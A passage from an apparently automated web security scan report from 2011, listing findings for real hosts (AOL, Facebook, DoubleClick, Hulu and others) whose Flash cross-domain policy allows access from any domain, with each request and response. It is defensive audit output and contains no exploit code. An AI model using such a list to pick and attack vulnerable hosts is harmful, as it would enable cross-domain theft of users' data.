GET /crossdomain.xml HTTP/1.0
Host: api.screenname.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:56:55 GMT
Server: Apache
Last-Modified: Wed, 10 Jun 2009 12:33:23 GMT
ETag: "ea-46bfdae5beac0"
Accept-Ranges: bytes
Content-Length: 234
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Keep-Alive: timeout=15, max=417
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.12. https://api.screenname.aol.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   https://api.screenname.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.screenname.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:52:31 GMT
Server: Apache
Last-Modified: Wed, 10 Jun 2009 12:33:23 GMT
ETag: "ea-46bfdae5beac0"
Accept-Ranges: bytes
Content-Length: 234
P3P: CP="PHY ONL PRE STA CURi OUR IND"
Keep-Alive: timeout=15, max=499
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.13. http://ar.voicefive.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ar.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ar.voicefive.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 00:56:58 GMT
Content-Type: text/xml
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes
Content-Length: 230
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
...[SNIP]...

6.14. http://at.atwola.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://at.atwola.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: at.atwola.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

6.15. https://at.atwola.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   https://at.atwola.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: at.atwola.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>

6.16. http://b.scorecardresearch.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Fri, 06 May 2011 00:56:23 GMT
Date: Thu, 05 May 2011 00:56:23 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.17. http://b.voicefive.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.voicefive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.voicefive.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Fri, 06 May 2011 00:56:59 GMT
Date: Thu, 05 May 2011 00:56:59 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...

6.18. http://bongo.zoomin.tv/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bongo.zoomin.tv
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bongo.zoomin.tv

Response

HTTP/1.1 200 OK
Cache-Control: max-age=900
Content-Length: 319
Content-Type: text/xml
Content-Location: http://bongo.zoomin.tv/crossdomain.xml
Last-Modified: Wed, 10 Sep 2008 12:51:04 GMT
Accept-Ranges: bytes
ETag: "40d9c8e24313c91:644"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 05 May 2011 10:52:39 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all"/>    
   <allow-access-from domain="*" />
...[SNIP]...

6.19. http://browser.cdn.aol.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://browser.cdn.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: browser.cdn.aol.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 13 Feb 2009 16:24:41 GMT
Mime-Version: 1.0
Server: AOLserver/4.0.10
Content-Type: text/xml
Content-Length: 421
Date: Thu, 05 May 2011 10:52:44 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSche
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.20. http://bs.serving-sys.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bs.serving-sys.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 21 Aug 2008 15:23:00 GMT
Accept-Ranges: bytes
ETag: "0e2c3cba13c91:0"
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Thu, 05 May 2011 12:39:08 GMT
Connection: close
Content-Length: 100

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
</cross-domain-policy>


6.21. http://c.brightcove.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.brightcove.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.brightcove.com

Response

HTTP/1.1 200 OK
X-BC-Client-IP: 173.193.214.243
X-BC-Connecting-IP: 173.193.214.243
Last-Modified: Thu, 10 Mar 2011 21:14:21 UTC
Cache-Control: must-revalidate,max-age=0
Content-Type: application/xml
Content-Length: 387
Date: Thu, 05 May 2011 10:52:45 GMT
Connection: keep-alive
Server:

<?xml version="1.0"?>
<cross-domain-policy>
<!-- Note: secure=false is confusing, but basically its saying
to allow SSL connections. Their reasoning is something
abo
...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...

6.22. http://cdn.at.atwola.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.at.atwola.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.at.atwola.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 13 Feb 2009 16:24:41 GMT
Mime-Version: 1.0
Server: AOLserver/4.0.10
Content-Type: text/xml
Date: Thu, 05 May 2011 00:57:01 GMT
Content-Length: 421
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSche
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.23. http://cdn.cinesport.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.cinesport.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.cinesport.com

Response

HTTP/1.0 200 OK
x-amz-id-2: fsIm3xhYo8+z1NDFMyG3Nrr+SApP93G2V2vlzGBwsnwCxNzNQieDdvqP/oWrLAb4
x-amz-request-id: 470DA743EB7902BE
Date: Thu, 28 Apr 2011 17:03:32 GMT
x-amz-meta-s3fox-filesize: 204
x-amz-meta-s3fox-modifiedtime: 1254865363318
Last-Modified: Tue, 06 Oct 2009 21:49:18 GMT
ETag: "199ac761aefc6dd785276dfea364b271"
Accept-Ranges: bytes
Content-Type: text/xml
Content-Length: 204
Server: AmazonS3
Age: 49988
X-Cache: Hit from cloudfront
X-Amz-Cf-Id: fb2dc2797745e7b9d6ed1908c7d898571b1715801fbbe161891918801b74ff92f9f7aeab96b6d57c
Via: 1.0 8a8618213617600186ecf6bd4987d76d.cloudfront.net:11180 (CloudFront), 1.0 26c110707e0d37c20949c3dad8cf524f.cloudfront.net:11180 (CloudFront)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...

6.24. http://cdn.digitalcity.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.digitalcity.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.digitalcity.com

Response

HTTP/1.0 200 OK
Last-Modified: Fri, 13 Feb 2009 16:24:41 GMT
Mime-Version: 1.0
Server: AOLserver/4.0.10
Content-Type: text/xml
Content-Length: 421
X-N: S
Date: Thu, 05 May 2011 13:02:47 GMT
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSche
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.25. http://cdn.eyewonder.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.eyewonder.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.eyewonder.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=18000
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "b2ae8e693141c91:13a0"
Server: Microsoft-IIS/6.0
p3p: policyref="/100125/w3c/p3p.xml", CP="NOI DSP LAW NID PSA OUR IND NAV STA COM"
X-Powered-By: ASP.NET
Age: 11310
Date: Thu, 05 May 2011 01:58:53 GMT
Last-Modified: Fri, 07 Nov 2008 23:34:43 GMT
Expires: Thu, 05 May 2011 03:50:23 GMT
Content-Length: 195
Connection: close

<?xml version="1.0"?>
<!-- http://cdn.eyewonder.com-->
<cross-domain-policy>
<allow-access-from domain="*" />
<site-control permitted-cross-domain-policies="all"/>
</cross-domain-policy>

6.26. http://cdn4.eyewonder.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn4.eyewonder.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn4.eyewonder.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:39:19 GMT
Server: Apache
Last-Modified: Fri, 19 Dec 2008 21:38:40 GMT
ETag: "1607e7-c7-45e6d21e5d800"
Accept-Ranges: bytes
Content-Length: 199
Keep-Alive: timeout=5
Connection: Keep-Alive
Content-Type: text/x-cross-domain-policy

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.27. http://clk.atdmt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://clk.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: clk.atdmt.com

Response

HTTP/1.1 200 OK
Content-Length: 207
Content-Type: image/gif
Date: Thu, 05 May 2011 10:52:48 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

6.28. http://config.hulu.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://config.hulu.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: config.hulu.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "bbf149a37cb7166ed38ed8229ab4db8a:1189204902"
Last-Modified: Tue, 07 Aug 2007 19:01:37 GMT
Accept-Ranges: bytes
Content-Length: 187
Content-Type: application/xml
Date: Thu, 05 May 2011 10:52:51 GMT
Connection: close

<?xml version="1.0"?>

<!-- used for controlling cross-domain data loading in Macromedia Flash -->
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>


6.29. http://content.mqcdn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://content.mqcdn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: content.mqcdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Accept-Ranges: bytes
Content-Length: 275
Content-Type: application/xml
Date: Thu, 05 May 2011 00:57:32 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
...[SNIP]...
<allow-access-from domain="*" secure="true"/>
...[SNIP]...

6.30. http://coverage.mqcdn.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://coverage.mqcdn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: coverage.mqcdn.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:09 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2
Connection: close
Content-Type: text/plain

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>
...[SNIP]...
<allow-access-from domain="*" secure="true"/>
...[SNIP]...

6.31. http://d.tradex.openx.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.tradex.openx.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:59:34 GMT
Server: Apache
Last-Modified: Tue, 21 Dec 2010 00:56:43 GMT
ETag: "27e07c-c7-497e11c2d28c0"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

6.32. http://d.xp1.ru4.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.xp1.ru4.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.xp1.ru4.com

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Thu, 05 May 2011 00:59:43 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: text/xml
Last-modified: Mon, 22 Nov 2010 21:32:05 GMT
Content-length: 202
Etag: "ca-4ceae155"
Accept-ranges: bytes
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

6.33. http://d1.openx.org/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://d1.openx.org
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d1.openx.org

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:18 GMT
Server: Apache
Last-Modified: Tue, 31 Aug 2010 01:04:36 GMT
ETag: "4c3a05-c7-48f142a249100"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

6.34. http://daol.aol.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://daol.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: daol.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:58:30 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 272
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.35. http://eatps.web.aol.com:9000/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://eatps.web.aol.com:9000
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: eatps.web.aol.com

Response

HTTP/1.1 200 OK
P3P: CP="UNI CUR OUR"
Date: Thu, 05 May 2011 00:59:03 GMT
Content-Length: 101
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

6.36. http://expapi.oscar.aol.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://expapi.oscar.aol.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: expapi.oscar.aol.com

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 10:52:58 GMT
Server: Apache
Last-Modified: Thu, 12 Oct 2006 16:41:52 GMT
ETag: "8e801a-68-41f9fd940b400"
Accept-Ranges: bytes
Content-Length: 104
Keep-Alive: timeout=1, max=90
Connection: Keep-Alive
Content-Type: application/xml

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

6.37. http://external.ak.fbcdn.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://external.ak.fbcdn.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: external.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "a27e344a618640558cd334164e432db0:1247617934"
Last-Modified: Wed, 15 Jul 2009 00:32:14 GMT
Accept-Ranges: bytes
Content-Length: 258
Content-Type: application/xml
Date: Thu, 05 May 2011 02:51:03 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.38. http://fls.doubleclick.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Thu, 05 May 2011 02:37:28 GMT
Expires: Sat, 30 Apr 2011 02:36:16 GMT
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block
Age: 29735
Cache-Control: public, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>
<site-
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

6.39. http://graph.facebook.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://graph.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: graph.facebook.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Content-Type: application/xml
Expires: Sat, 04 Jun 2011 10:53:06 GMT
X-FB-Server: 10.36.16.105
Connection: close
Content-Length: 280

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<site-
...[SNIP]...

6.40. http://gravatar.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: gravatar.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 05 May 2011 10:53:06 GMT
Content-Type: application/xml
Connection: close
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Accept-Ranges: bytes
Content-Length: 261

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

6.41. http://ib.adnxs.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Fri, 06-May-2011 01:41:27 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

6.42. http://idcs.interclick.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://idcs.interclick.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: idcs.interclick.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 19 Apr 2011 21:44:21 GMT
Accept-Ranges: bytes
ETag: "7b643f1dafecb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Thu, 05 May 2011 01:02:51 GMT
Connection: close
Content-Length: 225

